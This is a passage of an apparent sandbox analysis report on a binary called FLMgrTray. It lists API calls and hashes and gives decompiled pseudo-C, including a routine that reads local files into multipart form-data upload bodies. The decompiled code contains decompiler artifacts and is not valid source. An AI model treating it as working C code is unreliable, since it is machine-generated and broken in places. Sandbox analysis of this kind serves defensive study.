                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00191C18,00000001,?,?,2C80D730), ref: 00187098
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00191ED0,00000001), ref: 00187180
                                                                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?), ref: 001871B9
                                                                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000), ref: 001871E7
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00191C18,00000001), ref: 0018724D
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000003,00191ED0,00000001), ref: 00187280
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400), ref: 001872D5
                                                                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000400,00000004,?,?,00000000,00000400), ref: 001872F9
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00187302
                                                                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000004,?,00000003), ref: 00187326
                                                                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000004,00000003,00000003), ref: 001873B6
                                                                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?), ref: 0018740A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: strncpy_s$strncmp$atoimemset
                                                                                        • String ID: ftp$http$https
                                                                                        • API String ID: 495114311-33725036
                                                                                        • Opcode ID: a6027fccd88bf84d56407c9d51879e39959775886442d029dec957b99a52b0d0
                                                                                        • Instruction ID: 470bffb72d61005c764807736f8e2bb7c98d023c20977be0e443eff14b4eaa33
                                                                                        • Opcode Fuzzy Hash: a6027fccd88bf84d56407c9d51879e39959775886442d029dec957b99a52b0d0
                                                                                        • Instruction Fuzzy Hash: 4AE127756082049BCF259F28CC547F9BB66EF86308F2481EDDD499B682D7329B46CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _CxxThrowException.VCRUNTIME140(00000000,00000000,?), ref: 0016694E
                                                                                          • Part of subcall function 00175703: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 00175718
                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000010C), ref: 00166A30
                                                                                        • curl_easy_init.LIBCURL ref: 00166A42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionThrowcurl_easy_initmallocmemset
                                                                                        • String ID: curl/
                                                                                        • API String ID: 3322315705-1908215778
                                                                                        • Opcode ID: a7d26c2eff7e40e21b58bdea81ba033739df5f78ea0fdaafcba9a51fd51202ef
                                                                                        • Instruction ID: 3a0ed5e127258aa4d0c2d483173f7cff3dd5cd94f71a1b5767f8a7a6312ee520
                                                                                        • Opcode Fuzzy Hash: a7d26c2eff7e40e21b58bdea81ba033739df5f78ea0fdaafcba9a51fd51202ef
                                                                                        • Instruction Fuzzy Hash: B4E18C70E0021ADFDB14CFA8CD85BAEBBB5BF44304F148159E449AB681DB75AE94CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 96%
                                                                                        			E00185A90(intOrPtr __ecx, void** _a4, void* _a8) {
                                                                                        				intOrPtr _v8;
                                                                                        				long _v12;
                                                                                        				struct _OVERLAPPED* _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr* _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				long _v32;
                                                                                        				long _v36;
                                                                                        				void* _v40;
                                                                                        				long _t71;
                                                                                        				void* _t73;
                                                                                        				void _t75;
                                                                                        				void _t80;
                                                                                        				void _t83;
                                                                                        				intOrPtr* _t86;
                                                                                        				intOrPtr _t87;
                                                                                        				intOrPtr* _t88;
                                                                                        				intOrPtr _t90;
                                                                                        				intOrPtr _t94;
                                                                                        				intOrPtr* _t96;
                                                                                        				intOrPtr _t98;
                                                                                        				long _t104;
                                                                                        				void* _t106;
                                                                                        				long _t113;
                                                                                        				intOrPtr* _t119;
                                                                                        				intOrPtr _t120;
                                                                                        				CHAR* _t121;
                                                                                        				intOrPtr _t125;
                                                                                        				void* _t126;
                                                                                        				intOrPtr* _t128;
                                                                                        				void* _t129;
                                                                                        				void* _t130;
                                                                                        				struct _OVERLAPPED* _t132;
                                                                                        				void** _t133;
                                                                                        				void* _t135;
                                                                                        				void* _t137;
                                                                                        				void* _t139;
                                                                                        				intOrPtr* _t142;
                                                                                        				char _t144;
                                                                                        				intOrPtr* _t145;
                                                                                        				void* _t149;
                                                                                        				void* _t150;
                                                                                        				void* _t152;
                                                                                        				void* _t153;
                                                                                        				void* _t154;
                                                                                        				intOrPtr _t157;
                                                                                        				CHAR* _t159;
                                                                                        				intOrPtr* _t160;
                                                                                        				struct _OVERLAPPED* _t162;
                                                                                        				void* _t164;
                                                                                        				void** _t166;
                                                                                        				void** _t167;
                                                                                        				intOrPtr* _t169;
                                                                                        				long _t170;
                                                                                        				intOrPtr* _t172;
                                                                                        				void* _t173;
                                                                                        
                                                                                        				_t125 = __ecx;
                                                                                        				_t132 = 0;
                                                                                        				_t157 = 0;
                                                                                        				_v28 = __ecx;
                                                                                        				_v20 = 0;
                                                                                        				_v16 = 0;
                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) > 0) {
                                                                                        					_t119 =  *((intOrPtr*)(__ecx + 0x78));
                                                                                        					_t172 =  *_t119;
                                                                                        					if(_t172 != _t119) {
                                                                                        						do {
                                                                                        							_t120 =  *((intOrPtr*)(_t172 + 8));
                                                                                        							if( *((char*)(_t120 + 0x30)) == 0) {
                                                                                        								_t130 = 0x2000;
                                                                                        							} else {
                                                                                        								_t121 = _t120 + 0x18;
                                                                                        								if(_t121[0x14] >= 0x10) {
                                                                                        									_t121 =  *_t121;
                                                                                        								}
                                                                                        								_t164 = CreateFileA(_t121, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                        								_t9 = GetFileSize(_t164, 0) + 0x1800; // 0x1800
                                                                                        								_t130 = _t9;
                                                                                        								CloseHandle(_t164);
                                                                                        								_t132 = _v16;
                                                                                        							}
                                                                                        							_t172 =  *_t172;
                                                                                        							_t132 = _t132 + _t130;
                                                                                        							_t125 = _v28;
                                                                                        							_v16 = _t132;
                                                                                        						} while (_t172 !=  *((intOrPtr*)(_t125 + 0x78)));
                                                                                        						_t157 = 0;
                                                                                        					}
                                                                                        				}
                                                                                        				_t166 = _a4;
                                                                                        				_t15 = _t132 + 1; // 0x1
                                                                                        				_t71 = _t15;
                                                                                        				_v32 = _t71;
                                                                                        				if( *_t166 == 0) {
                                                                                        					_t73 = HeapAlloc(GetProcessHeap(), 8, _t71);
                                                                                        					_t133 = _t166;
                                                                                        					 *_t133 = _t73;
                                                                                        					if( *((intOrPtr*)(_t125 + 0x7c)) > 0) {
                                                                                        						_t86 =  *((intOrPtr*)(_t125 + 0x78));
                                                                                        						_t169 =  *_t86;
                                                                                        						_v24 = _t169;
                                                                                        						if(_t169 != _t86) {
                                                                                        							do {
                                                                                        								_t128 =  *((intOrPtr*)(_t169 + 8));
                                                                                        								_t152 = _v32 - _t157;
                                                                                        								_t87 =  *((intOrPtr*)(_t128 + 0x2c));
                                                                                        								_t141 =  *_t133 + _t157;
                                                                                        								_t159 = _t128 + 0x18;
                                                                                        								_v16 =  *_t133 + _t157;
                                                                                        								if( *((char*)(_t128 + 0x30)) == 0) {
                                                                                        									if(_t87 >= 0x10) {
                                                                                        										_t159 =  *_t159;
                                                                                        									}
                                                                                        									_t88 = _t128;
                                                                                        									if( *((intOrPtr*)(_t128 + 0x14)) >= 0x10) {
                                                                                        										_t88 =  *_t128;
                                                                                        									}
                                                                                        									_push(_t159);
                                                                                        									_t160 = _a8;
                                                                                        									_push(_t88);
                                                                                        									E001874E0(_t141, _t141, _t152, "--%s\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n", _t160);
                                                                                        									_t142 = _t160;
                                                                                        									_t173 = _t173 + 0x18;
                                                                                        									_t153 = _t142 + 1;
                                                                                        									do {
                                                                                        										_t90 =  *_t142;
                                                                                        										_t142 = _t142 + 1;
                                                                                        									} while (_t90 != 0);
                                                                                        									_t94 =  *((intOrPtr*)(_t128 + 0x28)) + 0x31 +  *((intOrPtr*)(_t128 + 0x10)) + _t142 - _t153;
                                                                                        								} else {
                                                                                        									_t144 = _t159;
                                                                                        									if(_t87 >= 0x10) {
                                                                                        										_t144 =  *_t159;
                                                                                        									}
                                                                                        									_t96 = _t128;
                                                                                        									if( *((intOrPtr*)(_t128 + 0x14)) >= 0x10) {
                                                                                        										_t96 =  *_t128;
                                                                                        									}
                                                                                        									_push(_t144);
                                                                                        									_push(_t96);
                                                                                        									E001874E0(_t144, _v16, _t152, "--%s\r\nContent-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n\r\n", _a8);
                                                                                        									_t145 = _a8;
                                                                                        									_t173 = _t173 + 0x18;
                                                                                        									_t154 = _t145 + 1;
                                                                                        									do {
                                                                                        										_t98 =  *_t145;
                                                                                        										_t145 = _t145 + 1;
                                                                                        									} while (_t98 != 0);
                                                                                        									_v8 =  *((intOrPtr*)(_t128 + 0x28)) + 0x3c +  *((intOrPtr*)(_t128 + 0x10)) + _t145 - _t154;
                                                                                        									if(_t159[0x14] >= 0x10) {
                                                                                        										_t159 =  *_t159;
                                                                                        									}
                                                                                        									_t129 = CreateFileA(_t159, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                        									if(_t129 == 0 || _t129 == 0xffffffff) {
                                                                                        										_t94 = _v8;
                                                                                        									} else {
                                                                                        										_t104 = GetFileSize(_t129, 0);
                                                                                        										_t162 = 0;
                                                                                        										_v36 = _t104;
                                                                                        										_t106 = _v8 + _v16;
                                                                                        										_v40 = _t106;
                                                                                        										_v12 = 0;
                                                                                        										if(ReadFile(_t129, _t106, 0x400,  &_v12, 0) != 0) {
                                                                                        											_t170 = _v36;
                                                                                        											while(1) {
                                                                                        												_t113 = _v12;
                                                                                        												if(_t113 == 0 || _t162 > _t170) {
                                                                                        													break;
                                                                                        												}
                                                                                        												_t162 = _t162 + _t113;
                                                                                        												if(ReadFile(_t129, _v40 + _t162, 0x400,  &_v12, 0) != 0) {
                                                                                        													continue;
                                                                                        												}
                                                                                        												break;
                                                                                        											}
                                                                                        											_t169 = _v24;
                                                                                        										}
                                                                                        										 *((short*)(_v16 + _t162 + _v8)) = 0xa0d;
                                                                                        										CloseHandle(_t129);
                                                                                        										_t94 = _v8 + 2 + _t162;
                                                                                        									}
                                                                                        								}
                                                                                        								_t169 =  *_t169;
                                                                                        								_t157 = _v20 + _t94;
                                                                                        								_t133 = _a4;
                                                                                        								_v20 = _t157;
                                                                                        								_v24 = _t169;
                                                                                        							} while (_t169 !=  *((intOrPtr*)(_v28 + 0x78)));
                                                                                        						}
                                                                                        					}
                                                                                        					_t126 = _a8;
                                                                                        					 *((short*)(_t157 +  *_t133)) = 0x2d2d;
                                                                                        					_t135 = _t126;
                                                                                        					_t149 = _t135 + 1;
                                                                                        					do {
                                                                                        						_t75 =  *_t135;
                                                                                        						_t135 = _t135 + 1;
                                                                                        					} while (_t75 != 0);
                                                                                        					_t167 = _a4;
                                                                                        					memcpy( *_t167 + 2 + _t157, _t126, _t135 - _t149);
                                                                                        					_t137 = _t126;
                                                                                        					_t150 = _t137 + 1;
                                                                                        					do {
                                                                                        						_t80 =  *_t137;
                                                                                        						_t137 = _t137 + 1;
                                                                                        					} while (_t80 != 0);
                                                                                        					_t139 = _t126 + 1;
                                                                                        					 *((intOrPtr*)( *_t167 + _t137 - _t150 + _t157 + 2)) = 0xa0d2d2d;
                                                                                        					do {
                                                                                        						_t83 =  *_t126;
                                                                                        						_t126 = _t126 + 1;
                                                                                        					} while (_t83 != 0);
                                                                                        					_t70 = _t157 + 6; // 0x6
                                                                                        					return _t70 + _t126 - _t139;
                                                                                        				} else {
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}



























































                                                                                        0x00185a97
                                                                                        0x00185a99
                                                                                        0x00185a9d
                                                                                        0x00185a9f
                                                                                        0x00185aa2
                                                                                        0x00185aa5
                                                                                        0x00185aab
                                                                                        0x00185aad
                                                                                        0x00185ab0
                                                                                        0x00185ab4
                                                                                        0x00185ab6
                                                                                        0x00185ab6
                                                                                        0x00185abd
                                                                                        0x00185b00
                                                                                        0x00185abf
                                                                                        0x00185abf
                                                                                        0x00185ac6
                                                                                        0x00185ac8
                                                                                        0x00185ac8
                                                                                        0x00185ae3
                                                                                        0x00185aef
                                                                                        0x00185aef
                                                                                        0x00185af5
                                                                                        0x00185afb
                                                                                        0x00185afb
                                                                                        0x00185b05
                                                                                        0x00185b07
                                                                                        0x00185b09
                                                                                        0x00185b0c
                                                                                        0x00185b0f
                                                                                        0x00185b14
                                                                                        0x00185b14
                                                                                        0x00185ab4
                                                                                        0x00185b16
                                                                                        0x00185b19
                                                                                        0x00185b19
                                                                                        0x00185b1c
                                                                                        0x00185b22
                                                                                        0x00185b39
                                                                                        0x00185b3f
                                                                                        0x00185b41
                                                                                        0x00185b47
                                                                                        0x00185b4d
                                                                                        0x00185b50
                                                                                        0x00185b52
                                                                                        0x00185b57
                                                                                        0x00185b60
                                                                                        0x00185b60
                                                                                        0x00185b68
                                                                                        0x00185b6a
                                                                                        0x00185b6d
                                                                                        0x00185b73
                                                                                        0x00185b76
                                                                                        0x00185b79
                                                                                        0x00185c83
                                                                                        0x00185c85
                                                                                        0x00185c85
                                                                                        0x00185c8b
                                                                                        0x00185c8d
                                                                                        0x00185c8f
                                                                                        0x00185c8f
                                                                                        0x00185c91
                                                                                        0x00185c92
                                                                                        0x00185c95
                                                                                        0x00185c9e
                                                                                        0x00185ca3
                                                                                        0x00185ca5
                                                                                        0x00185ca8
                                                                                        0x00185cb0
                                                                                        0x00185cb0
                                                                                        0x00185cb2
                                                                                        0x00185cb3
                                                                                        0x00185cc2
                                                                                        0x00185b7f
                                                                                        0x00185b7f
                                                                                        0x00185b84
                                                                                        0x00185b86
                                                                                        0x00185b86
                                                                                        0x00185b8c
                                                                                        0x00185b8e
                                                                                        0x00185b90
                                                                                        0x00185b90
                                                                                        0x00185b92
                                                                                        0x00185b93
                                                                                        0x00185ba0
                                                                                        0x00185ba5
                                                                                        0x00185ba8
                                                                                        0x00185bab
                                                                                        0x00185bb0
                                                                                        0x00185bb0
                                                                                        0x00185bb2
                                                                                        0x00185bb3
                                                                                        0x00185bc8
                                                                                        0x00185bcb
                                                                                        0x00185bcd
                                                                                        0x00185bcd
                                                                                        0x00185be8
                                                                                        0x00185bec
                                                                                        0x00185cc6
                                                                                        0x00185bfb
                                                                                        0x00185bfe
                                                                                        0x00185c04
                                                                                        0x00185c06
                                                                                        0x00185c0f
                                                                                        0x00185c1b
                                                                                        0x00185c1e
                                                                                        0x00185c2d
                                                                                        0x00185c2f
                                                                                        0x00185c32
                                                                                        0x00185c32
                                                                                        0x00185c37
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00185c3d
                                                                                        0x00185c59
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00185c59
                                                                                        0x00185c5b
                                                                                        0x00185c5b
                                                                                        0x00185c6c
                                                                                        0x00185c70
                                                                                        0x00185c7c
                                                                                        0x00185c7c
                                                                                        0x00185bec
                                                                                        0x00185ccc
                                                                                        0x00185cce
                                                                                        0x00185cd3
                                                                                        0x00185cd6
                                                                                        0x00185cd9
                                                                                        0x00185cdc
                                                                                        0x00185b60
                                                                                        0x00185b57
                                                                                        0x00185cec
                                                                                        0x00185cef
                                                                                        0x00185cf3
                                                                                        0x00185cf5
                                                                                        0x00185cf8
                                                                                        0x00185cf8
                                                                                        0x00185cfa
                                                                                        0x00185cfb
                                                                                        0x00185cff
                                                                                        0x00185d0e
                                                                                        0x00185d13
                                                                                        0x00185d18
                                                                                        0x00185d20
                                                                                        0x00185d20
                                                                                        0x00185d22
                                                                                        0x00185d23
                                                                                        0x00185d2d
                                                                                        0x00185d30
                                                                                        0x00185d38
                                                                                        0x00185d38
                                                                                        0x00185d3a
                                                                                        0x00185d3b
                                                                                        0x00185d3f
                                                                                        0x00185d4c
                                                                                        0x00185b24
                                                                                        0x00185b2c
                                                                                        0x00185b2c

                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00185ADD
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00185AE8
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00185AF5
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00185B32
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00185B39
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00185BE2
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00185BFE
                                                                                        • ReadFile.KERNEL32(00000000,?,00000400,?,00000000), ref: 00185C25
                                                                                        • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000), ref: 00185C51
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00185C70
                                                                                        • memcpy.VCRUNTIME140(-00000002,?,?), ref: 00185D0E
                                                                                        Strings
                                                                                        • --%sContent-Disposition: form-data; name="%s"%s, xrefs: 00185C97
                                                                                        • --, xrefs: 00185D30
                                                                                        • --%sContent-Disposition: form-data; name="%s"; filename="%s", xrefs: 00185B97
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleHeapReadSize$AllocProcessmemcpy
                                                                                        • String ID: --$--%sContent-Disposition: form-data; name="%s"%s$--%sContent-Disposition: form-data; name="%s"; filename="%s"
                                                                                        • API String ID: 3503652403-2380197026
                                                                                        • Opcode ID: 5154f4b5ab56368ecca81c7171e85c4cdfc897878dfafb73848b8b36898163ae
                                                                                        • Instruction ID: 4aca5c78a327af0acb31bbfd2535fc069860955917bce5455fafd1d1a0e443ab
                                                                                        • Opcode Fuzzy Hash: 5154f4b5ab56368ecca81c7171e85c4cdfc897878dfafb73848b8b36898163ae
                                                                                        • Instruction Fuzzy Hash: 1791AD72A00605EFDB14DF68C885BAAB7BAFF49314F1541A8E851AB352D770EE41CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 62%
                                                                                        			E00164380(void* __ebx, void* __ecx, void* __edi, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                                                        				unsigned int _v8;
                                                                                        				int _v12;
                                                                                        				void* _v16;
                                                                                        				void* _v20;
                                                                                        				void* _t83;
                                                                                        				unsigned int _t84;
                                                                                        				signed int _t88;
                                                                                        				unsigned int _t89;
                                                                                        				void* _t94;
                                                                                        				void* _t114;
                                                                                        				void* _t115;
                                                                                        				int _t140;
                                                                                        				intOrPtr* _t148;
                                                                                        				signed int _t150;
                                                                                        				void* _t151;
                                                                                        				void* _t154;
                                                                                        				void* _t157;
                                                                                        				void* _t161;
                                                                                        				void* _t162;
                                                                                        				void* _t163;
                                                                                        				void* _t167;
                                                                                        				void* _t171;
                                                                                        				void* _t172;
                                                                                        				intOrPtr _t180;
                                                                                        				intOrPtr* _t181;
                                                                                        				void* _t185;
                                                                                        				void* _t187;
                                                                                        				int _t188;
                                                                                        				void* _t190;
                                                                                        				void* _t200;
                                                                                        				void* _t201;
                                                                                        
                                                                                        				_t163 = _a4;
                                                                                        				_t201 = _t200 - 0x10;
                                                                                        				_push(__ebx);
                                                                                        				_push(_t180);
                                                                                        				_t174 = __ecx;
                                                                                        				_t148 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                        				if(_t148 < _t163) {
                                                                                        					E00164210(__ebx, _t148, __ecx);
                                                                                        					goto L33;
                                                                                        				} else {
                                                                                        					_t140 = _a16;
                                                                                        					_t83 = _t148 - _t163;
                                                                                        					_v20 = _t83;
                                                                                        					_t180 =  <  ? _t83 : _a8;
                                                                                        					_t84 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                        					_a8 = _t180;
                                                                                        					_v8 = _t84;
                                                                                        					if(_t180 != _t140) {
                                                                                        						_v12 = _v20 - _t180 + 1;
                                                                                        						_t167 = _a4;
                                                                                        						if(_t140 >= _t180) {
                                                                                        							_a16 = _t140;
                                                                                        							_a16 = _a16 - _t180;
                                                                                        							if(_a16 > _t84 - _t148) {
                                                                                        								_t163 = _a16;
                                                                                        								if(0x7fffffff - _t148 < _t163) {
                                                                                        									L33:
                                                                                        									E001631F0(_t163);
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									asm("int3");
                                                                                        									_push(_t180);
                                                                                        									_t181 = _t148;
                                                                                        									 *_t181 = malloc(0x408);
                                                                                        									return _t181;
                                                                                        								} else {
                                                                                        									_t88 = _t148 + _t163;
                                                                                        									_v16 = _t88;
                                                                                        									_t150 = _t88 | 0x0000000f;
                                                                                        									if(_t150 <= 0x7fffffff) {
                                                                                        										_t89 = _v8;
                                                                                        										_a16 = _t89 >> 1;
                                                                                        										_t163 = 0x7fffffff - _a16;
                                                                                        										if(_t89 <= 0x7fffffff) {
                                                                                        											_t151 =  <  ? _a16 + _t89 : _t150;
                                                                                        										} else {
                                                                                        											_t151 = 0x7fffffff;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t151 = 0x7fffffff;
                                                                                        									}
                                                                                        									_t50 = _t151 + 1; // 0x80000000
                                                                                        									_a16 = _t151;
                                                                                        									_t171 = E00163200(_t163, _t50);
                                                                                        									 *((intOrPtr*)(_t174 + 0x10)) = _v16;
                                                                                        									_t94 = _a4;
                                                                                        									 *((intOrPtr*)(_t174 + 0x14)) = _a16;
                                                                                        									_v20 = _t171;
                                                                                        									_push(_t94);
                                                                                        									_t154 = _t171 + _t94;
                                                                                        									_a16 = _t154;
                                                                                        									_v16 = _t154 + _t140;
                                                                                        									if(_v8 < 0x10) {
                                                                                        										L31:
                                                                                        										memcpy(_t171, _t174, ??);
                                                                                        										memcpy(_a16, _a12, _t140);
                                                                                        										memcpy(_v16, _a4 + _t180 + _t174, _v12);
                                                                                        										 *_t174 = _v20;
                                                                                        										return _t174;
                                                                                        									} else {
                                                                                        										_t185 =  *_t174;
                                                                                        										memcpy(_t171, _t185, ??);
                                                                                        										memcpy(_a16, _a12, _t140);
                                                                                        										_t108 = memcpy(_v16, _a4 + _t185 + _a8, _v12);
                                                                                        										_t201 = _t201 + 0x24;
                                                                                        										_t157 = _v8 + 1;
                                                                                        										if(_t157 < 0x1000) {
                                                                                        											L29:
                                                                                        											_push(_t157);
                                                                                        											E00175733(_t108, _t185);
                                                                                        											 *_t174 = _v20;
                                                                                        											return _t174;
                                                                                        										} else {
                                                                                        											_t171 =  *(_t185 - 4);
                                                                                        											_t157 = _t157 + 0x23;
                                                                                        											_t180 = _t185 - _t171;
                                                                                        											_t108 = _t180 - 4;
                                                                                        											if(_t180 - 4 > 0x1f) {
                                                                                        												__imp___invalid_parameter_noinfo_noreturn();
                                                                                        												goto L31;
                                                                                        											} else {
                                                                                        												_t185 = _t171;
                                                                                        												goto L29;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								_a8 = __ecx;
                                                                                        								 *((intOrPtr*)(__ecx + 0x10)) = _a16 + _t148;
                                                                                        								_t114 = __ecx;
                                                                                        								if(_v8 >= 0x10) {
                                                                                        									_t114 =  *((intOrPtr*)(__ecx));
                                                                                        									_a8 = _t114;
                                                                                        								}
                                                                                        								_t115 = _t114 + _t167;
                                                                                        								_t172 = _a12;
                                                                                        								_t187 = _t180 + _t115;
                                                                                        								_a4 = _t115;
                                                                                        								_v20 = _t187;
                                                                                        								if(_t172 + _t140 <= _a4 || _t172 > _a8 + _t148) {
                                                                                        									_t188 = _t140;
                                                                                        								} else {
                                                                                        									if(_t187 > _t172) {
                                                                                        										_t188 = _t187 - _t172;
                                                                                        									} else {
                                                                                        										_t188 = 0;
                                                                                        									}
                                                                                        								}
                                                                                        								memmove(_a16 + _v20, _v20, _v12);
                                                                                        								memmove(_a4, _a12, _t188);
                                                                                        								memcpy(_a4 + _t188, _a16 + _t188 + _a12, _t140 - _t188);
                                                                                        								return _t174;
                                                                                        							}
                                                                                        						} else {
                                                                                        							 *((intOrPtr*)(__ecx + 0x10)) = _t148 - _t180 + _t140;
                                                                                        							_t161 = __ecx;
                                                                                        							if(_t84 >= 0x10) {
                                                                                        								_t161 =  *((intOrPtr*)(__ecx));
                                                                                        							}
                                                                                        							_t190 = _t161 + _t167;
                                                                                        							memmove(_t190, _a12, _t140);
                                                                                        							memmove(_t190 + _t140, _a8 + _t190, _v12);
                                                                                        							return _t174;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t162 = __ecx;
                                                                                        						if(_t84 >= 0x10) {
                                                                                        							_t162 =  *((intOrPtr*)(__ecx));
                                                                                        						}
                                                                                        						memmove(_t162 + _t163, _a12, _t140);
                                                                                        						return _t174;
                                                                                        					}
                                                                                        				}
                                                                                        			}


































                                                                                        0x00164383
                                                                                        0x00164386
                                                                                        0x00164389
                                                                                        0x0016438a
                                                                                        0x0016438c
                                                                                        0x0016438e
                                                                                        0x00164393
                                                                                        0x001645e9
                                                                                        0x00000000
                                                                                        0x00164399
                                                                                        0x0016439e
                                                                                        0x001643a1
                                                                                        0x001643a5
                                                                                        0x001643a8
                                                                                        0x001643ab
                                                                                        0x001643ae
                                                                                        0x001643b1
                                                                                        0x001643b6
                                                                                        0x001643e2
                                                                                        0x001643e5
                                                                                        0x001643ea
                                                                                        0x00164429
                                                                                        0x0016442e
                                                                                        0x00164434
                                                                                        0x001644c1
                                                                                        0x001644cd
                                                                                        0x001645ee
                                                                                        0x001645ee
                                                                                        0x001645f3
                                                                                        0x001645f4
                                                                                        0x001645f5
                                                                                        0x001645f6
                                                                                        0x001645f7
                                                                                        0x001645f8
                                                                                        0x001645f9
                                                                                        0x001645fa
                                                                                        0x001645fb
                                                                                        0x001645fc
                                                                                        0x001645fd
                                                                                        0x001645fe
                                                                                        0x001645ff
                                                                                        0x00164600
                                                                                        0x00164606
                                                                                        0x00164611
                                                                                        0x00164616
                                                                                        0x001644d3
                                                                                        0x001644d3
                                                                                        0x001644d8
                                                                                        0x001644db
                                                                                        0x001644e4
                                                                                        0x001644ed
                                                                                        0x001644f4
                                                                                        0x001644fc
                                                                                        0x00164501
                                                                                        0x0016450f
                                                                                        0x00164503
                                                                                        0x00164503
                                                                                        0x00164503
                                                                                        0x001644e6
                                                                                        0x001644e6
                                                                                        0x001644e6
                                                                                        0x00164512
                                                                                        0x00164515
                                                                                        0x00164523
                                                                                        0x00164528
                                                                                        0x0016452b
                                                                                        0x0016452e
                                                                                        0x00164531
                                                                                        0x00164534
                                                                                        0x00164535
                                                                                        0x00164538
                                                                                        0x00164541
                                                                                        0x00164544
                                                                                        0x001645b0
                                                                                        0x001645b2
                                                                                        0x001645be
                                                                                        0x001645d1
                                                                                        0x001645dc
                                                                                        0x001645e6
                                                                                        0x00164546
                                                                                        0x00164546
